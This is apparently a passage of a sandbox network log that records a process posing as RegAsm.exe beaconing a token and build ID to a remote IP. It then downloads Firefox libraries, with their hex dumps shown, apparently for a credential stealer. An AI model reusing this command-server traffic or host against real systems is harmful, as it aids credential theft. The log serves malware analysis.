2024-04-26 09:03:04 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:04 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------KFIJJEGHDAEBGCAKJKFHCont
2024-04-26 09:03:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:05 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:05 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:05 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------AAFIDGCFHIEHJJJJECAKCont
2024-04-26 09:03:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:06 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:08 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:08 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------JDGIECGIEBKJJJJKEGHJCont
2024-04-26 09:03:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:09 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:09 UTC	158	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 09:03:09 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:09 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-04-26 09:03:09 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-04-26 09:03:09 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-04-26 09:03:10 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-04-26 09:03:10 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-04-26 09:03:10 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-04-26 09:03:10 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-04-26 09:03:10 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-04-26 09:03:10 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-04-26 09:03:10 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-04-26 09:03:10 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49744	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:11 UTC	158	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 09:03:12 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:12 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-04-26 09:03:12 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-04-26 09:03:12 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-04-26 09:03:12 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-04-26 09:03:13 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-04-26 09:03:13 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
